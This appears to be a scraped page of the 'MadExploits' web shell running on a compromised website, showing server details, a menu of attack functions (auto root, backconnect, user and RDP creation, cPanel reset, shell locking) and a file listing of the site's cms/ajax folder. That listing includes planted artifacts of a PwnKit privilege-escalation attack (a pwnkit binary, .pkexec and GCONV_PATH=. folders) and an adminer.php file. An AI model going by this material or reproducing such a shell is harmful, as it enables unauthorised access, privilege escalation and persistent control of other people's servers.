Linux cool-chatelet.209-46-124-25.plesk.page 6.8.0-60-generic #63-Ubuntu SMP PREEMPT_DYNAMIC Tue Apr 15 19:04:15 UTC 2025 x86_64
nginx/1.26.3
: 209.46.124.25 | : 216.73.216.5
Cant Read [ /etc/named.conf ]
8.3.21
beghelli.com.mx_t822czighbk
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
vhosts /
beghelli.com.mx /
httpdocs /
cms /
ajax /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminAjax.php
1013
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
agentAjax.php
889
B
-rw-r--r--
agentResourcesAjax.php
0
B
-rw-r--r--
asociationsAjax.php
720
B
-rw-r--r--
catalogAjax.php
1.01
KB
-rw-r--r--
catalogCategoryAjax.php
1.19
KB
-rw-r--r--
categoryAjax.php
1.38
KB
-rw-r--r--
certificationsAjax.php
747
B
-rw-r--r--
cloudAjax.php
1.82
KB
-rw-r--r--
distributorAjax.php
967
B
-rw-r--r--
loginAjax.php
479
B
-rw-r--r--
mapAjax.php
1023
B
-rw-r--r--
mediaAjax.php
743
B
-rw-r--r--
newsAjax.php
664
B
-rw-r--r--
pedritoAjax.php
546
B
-rw-r--r--
productAjax.php
1.28
KB
-rw-r--r--
productCategoryAjax.php
759
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
sliderAjax.php
809
B
-rw-r--r--
successAjax.php
691
B
-rw-r--r--
technicalInformationAjax.php
815
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : catalogAjax.php
<?php $ajaxRequest = true; require_once "../config/app.php"; session_start(['name'=>'ATL']); if(isset($_POST['cat_mod'])){ require_once "../controller/catalogController.php"; $ins_controller = new catalogController(); if($_POST['cat_mod']=="cre"){ echo $ins_controller -> create_catalog_controller(); } if($_POST['cat_mod']=="del"){ echo $ins_controller -> delete_catalog_controller(); } if($_POST['cat_mod']=="upd"){ echo $ins_controller -> update_catalog_controller(); } if($_POST['cat_mod']=="sea"){ echo $ins_controller -> search_catalog_controller(); } if($_POST['cat_mod']=="unsea"){ echo $ins_controller -> unsearch_catalog_controller(); } }else { session_unset(); session_destroy(); header("Location:".SERVERURL."index"); exit(); } ?>
Close